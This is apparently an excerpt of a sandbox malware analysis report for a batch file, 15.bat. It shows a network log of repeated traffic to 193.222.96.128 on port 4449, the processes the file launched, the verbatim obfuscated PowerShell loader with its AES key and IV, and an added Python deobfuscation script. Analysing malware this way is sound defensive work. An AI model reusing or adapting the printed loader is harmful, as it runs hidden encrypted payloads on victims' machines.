                  Apr 20, 2024 10:08:20.994580030 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:20.995210886 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:21.198880911 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:21.244595051 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:21.447427034 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:21.448872089 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:21.700268030 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:21.700561047 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:21.945967913 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:25.877058029 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:26.120178938 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:26.120237112 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:26.326407909 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:26.369549990 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:26.571538925 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:26.573317051 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:26.814169884 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:26.814420938 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:27.059061050 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:32.316456079 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:32.559765100 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:32.560513973 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:32.765739918 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:32.824310064 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:33.026349068 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:33.032454967 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:33.277077913 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:33.277167082 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:33.518673897 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:36.191926003 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:36.444488049 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:36.448460102 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:36.652668953 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:36.700305939 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:36.902323961 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:36.905848026 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:37.151871920 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:37.152394056 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:37.396064997 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:48.142391920 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:48.385396957 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:48.385489941 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:48.595282078 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:48.808269978 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:48.906841993 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:48.909461975 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:48.909461975 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:49.011441946 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:49.016366005 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:49.169727087 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:49.176269054 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:49.429147959 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:50.552264929 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:50.804824114 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:50.812364101 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:51.028325081 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:51.120264053 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:51.322262049 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:51.323622942 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:51.569945097 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:51.570003033 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:51.811731100 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:53.595623016 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:53.850042105 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:53.850097895 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:54.053874969 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:54.180341959 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:54.382478952 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:54.392261982 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:54.635580063 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:54.635665894 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:54.881201029 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:54.881382942 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:55.085460901 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:55.307039976 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:55.488559961 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:55.488656998 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:55.509259939 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:55.509394884 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:55.736763000 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:55.985121012 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:08:55.985238075 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:08:56.228465080 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:00.017076969 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:00.280605078 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:00.280711889 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:00.487252951 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:00.620268106 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:00.628362894 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:00.822109938 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:00.822429895 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:00.875524044 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:00.876127958 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:01.029695034 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:01.036277056 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:01.078150988 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:01.080322027 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:01.084247112 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:01.328988075 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:01.329061031 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:01.572758913 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:02.142182112 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:02.385752916 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:02.392256975 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:02.597826958 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:02.807012081 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:03.003794909 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:03.006412983 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:03.007674932 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:03.009100914 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:03.009347916 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:03.249538898 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:03.254878044 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:03.497903109 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:15.286618948 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:15.538393021 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:15.538562059 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:15.743514061 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:15.822498083 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:16.024661064 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:16.026664019 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:16.275751114 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:16.275818110 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:16.527018070 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:21.036266088 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:21.278973103 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:21.284245968 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:21.497720003 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:21.590452909 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:21.792439938 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:21.793909073 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:22.038063049 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:22.038136005 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:22.246954918 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:22.324230909 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:22.526444912 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:22.532236099 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:22.778840065 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:22.778987885 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:23.033025980 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:23.036304951 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:23.254743099 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:23.322510004 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:23.524696112 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:23.526392937 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:23.769268036 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:23.769481897 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:24.012258053 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:30.440577030 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:30.683166027 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:30.688365936 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:30.892862082 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:31.112229109 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:31.277075052 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:31.280277014 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:31.280277014 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:31.315298080 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:31.316246986 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:31.316342115 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:31.483474016 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:31.518315077 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:31.518522024 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:31.520015955 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:31.775594950 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:31.775758982 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:32.020936012 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:43.276211023 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:43.520788908 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:43.520865917 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:43.724879026 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:43.775610924 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:43.977382898 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:43.979890108 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:44.222058058 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:44.222122908 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:44.465137005 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:44.816210985 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:45.059978962 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:45.064209938 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:45.267447948 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:45.324214935 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:45.526329994 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:45.528013945 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:45.780250072 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:45.780452967 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:46.025827885 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:46.285476923 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:46.536556005 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:46.544210911 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:46.747688055 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:46.792200089 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:46.994659901 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:47.003201008 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:47.246016026 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:47.252191067 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:47.456177950 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:47.510021925 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:47.712292910 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:47.714272976 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:47.973675966 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:47.973855972 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:48.216449022 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:53.675286055 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:53.928735971 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:53.928927898 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:54.132782936 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:54.181977034 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:54.384277105 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:54.388019085 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:54.638042927 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:09:54.638366938 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:09:54.881268024 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:10:01.488622904 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:10:01.740128994 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:10:01.744214058 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:10:01.946973085 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:10:02.088129044 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:10:02.266036987 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:10:02.268217087 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:10:02.290721893 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:10:02.292213917 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:10:02.628458023 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:10:02.878638029 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:10:02.878731966 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:10:03.120935917 CEST444949730193.222.96.128192.168.2.4


                  Target ID:0
                  Start time:10:05:55
                  Start date:20/04/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\15.bat" "
                  Imagebase:0x7ff61b9b0000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:1
                  Start time:10:05:55
                  Start date:20/04/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7699e0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:2
                  Start time:10:05:55
                  Start date:20/04/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\15.bat"
                  Imagebase:0x7ff61b9b0000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:3
                  Start time:10:05:55
                  Start date:20/04/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7699e0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:4
                  Start time:10:05:55
                  Start date:20/04/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\15.bat';$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes', ''),'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB', ''),'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb', ''),'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),'CDYnropDYnryToDYnr'.Replace('DYnr', ''),'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI', ''),'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg', ''),'Loajyrjdjyrj'.Replace('jyrj', '');powershell -w hidden;function FBejp($JKmLP){$UerdI=[System.Security.Cryptography.Aes]::Create();$UerdI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UerdI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UerdI.Key=[System.Convert]::($MMJz[12])('dVsAn8RIciGbSq5PEUSffnRQiEF7D6JhJ+MhQGAxpxA=');$UerdI.IV=[System.Convert]::($MMJz[12])('rrMf8DdSiOTkJYW5AhOOlg==');$ytGVg=$UerdI.($MMJz[3])();$FTQFX=$ytGVg.($MMJz[10])($JKmLP,0,$JKmLP.Length);$ytGVg.Dispose();$UerdI.Dispose();$FTQFX;}function mpyCC($JKmLP){$FjjxJ=New-Object System.IO.MemoryStream(,$JKmLP);$sySFb=New-Object System.IO.MemoryStream;$Rdfpf=New-Object System.IO.Compression.GZipStream($FjjxJ,[IO.Compression.CompressionMode]::($MMJz[5]));$Rdfpf.($MMJz[7])($sySFb);$Rdfpf.Dispose();$FjjxJ.Dispose();$sySFb.Dispose();$sySFb.ToArray();}$BklLD=[System.IO.File]::($MMJz[8])([Console]::Title);$oNBKh=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 5).Substring(2))));$HuDRY=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 6).Substring(2))));[System.Reflection.Assembly]::($MMJz[13])([byte[]]$HuDRY).($MMJz[6]).($MMJz[9])($null,$null);[System.Reflection.Assembly]::($MMJz[13])([byte[]]$oNBKh).($MMJz[6]).($MMJz[9])($null,$null); "
                  Imagebase:0x7ff61b9b0000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true
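                  The command line recorded for Target ID 4 above is the whole loader that is visible in this report. Every .NET member it needs is kept in the $MMJz array with a junk token spliced into each name and stripped by .Replace() at run time, and the script then calls those members indirectly as $obj.($MMJz[n]) or [Type]::($MMJz[n]), so names such as FromBase64String, CreateDecryptor or Load never appear as plain strings. The Python script below is an added example and is not part of the Joe Sandbox report or of the sample: it resolves that array from a copy of the command line, rewrites the indirect calls into ordinary member access, and decodes the hard-coded AES key and IV. LOADER_EXCERPT is copied from the command line above with only line breaks added; the function names, regular expressions and the assumption that the loader uses a single array with one junk token per element are mine.

```python
import base64
import re

# Excerpt of the cmd.exe command line recorded in this report (Target ID 4).
# Statements are copied verbatim; only the line breaks were added. The $MMJz
# array holds every .NET member name the loader needs, each padded with a junk
# token that .Replace() strips at run time, and the loader then calls members
# indirectly as $obj.($MMJz[n]) so the real names never appear as literals.
LOADER_EXCERPT = (
    "$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes', ''),"
    "'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),"
    "'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB', ''),"
    "'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),"
    "'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb', ''),"
    "'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),"
    "'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),"
    "'CDYnropDYnryToDYnr'.Replace('DYnr', ''),"
    "'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),"
    "'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),"
    "'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI', ''),"
    "'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),"
    "'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg', ''),"
    "'Loajyrjdjyrj'.Replace('jyrj', '');"
    "$UerdI.Key=[System.Convert]::($MMJz[12])('dVsAn8RIciGbSq5PEUSffnRQiEF7D6JhJ+MhQGAxpxA=');"
    "$UerdI.IV=[System.Convert]::($MMJz[12])('rrMf8DdSiOTkJYW5AhOOlg==');"
    "$ytGVg=$UerdI.($MMJz[3])();"
    "$FTQFX=$ytGVg.($MMJz[10])($JKmLP,0,$JKmLP.Length);"
    "$Rdfpf=New-Object System.IO.Compression.GZipStream($FjjxJ,[IO.Compression.CompressionMode]::($MMJz[5]));"
    "$Rdfpf.($MMJz[7])($sySFb);"
    "$BklLD=[System.IO.File]::($MMJz[8])([Console]::Title);"
    "$oNBKh=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 5).Substring(2))));"
    "[System.Reflection.Assembly]::($MMJz[13])([byte[]]$HuDRY).($MMJz[6]).($MMJz[9])($null,$null);"
)

# $name='padded'.Replace('junk', ''),'padded'.Replace('junk', ''),...;
ARRAY_RE = re.compile(r"\$(\w+)=((?:'[^']*'\.Replace\('[^']*', ''\),?)+);")
ITEM_RE = re.compile(r"'([^']*)'\.Replace\('([^']*)', ''\)")


def resolve_array(script):
    """Find the first .Replace()-obfuscated string array and return
    (array name, list of the member names it evaluates to at run time)."""
    match = ARRAY_RE.search(script)
    if match is None:
        raise ValueError("no .Replace()-obfuscated string array found")
    names = [padded.replace(junk, "") for padded, junk in ITEM_RE.findall(match.group(2))]
    return match.group(1), names


def deobfuscate(script):
    """Substitute $name[n] with the resolved member name, drop the now unused
    array assignment, and turn the $obj.(Name) / [Type]::(Name) indirect
    member syntax back into plain member access."""
    name, names = resolve_array(script)
    indexed = re.compile(r"\$" + re.escape(name) + r"\[(\d+)\]")
    cleaned = indexed.sub(lambda m: names[int(m.group(1))], script)
    cleaned = ARRAY_RE.sub("", cleaned, count=1)
    cleaned = re.sub(r"\.\((\w+)\)", r".\1", cleaned)
    cleaned = re.sub(r"::\((\w+)\)", r"::\1", cleaned)
    return cleaned


def extract_aes_material(cleaned):
    """Return (key, iv) as bytes from the deobfuscated script's .Key= and .IV= lines."""
    key_b64 = re.search(r"\.Key=\[System\.Convert\]::FromBase64String\('([^']+)'\)", cleaned).group(1)
    iv_b64 = re.search(r"\.IV=\[System\.Convert\]::FromBase64String\('([^']+)'\)", cleaned).group(1)
    return base64.b64decode(key_b64), base64.b64decode(iv_b64)


if __name__ == "__main__":
    array_name, members = resolve_array(LOADER_EXCERPT)
    for index, member in enumerate(members):
        print(f"${array_name}[{index}] -> {member}")
    readable = deobfuscate(LOADER_EXCERPT)
    print(readable.replace(";", ";\n"))
    key, iv = extract_aes_material(readable)
    print(f"AES key: {len(key)} bytes {key.hex()}")
    print(f"AES IV:  {len(iv)} bytes {iv.hex()}")
```

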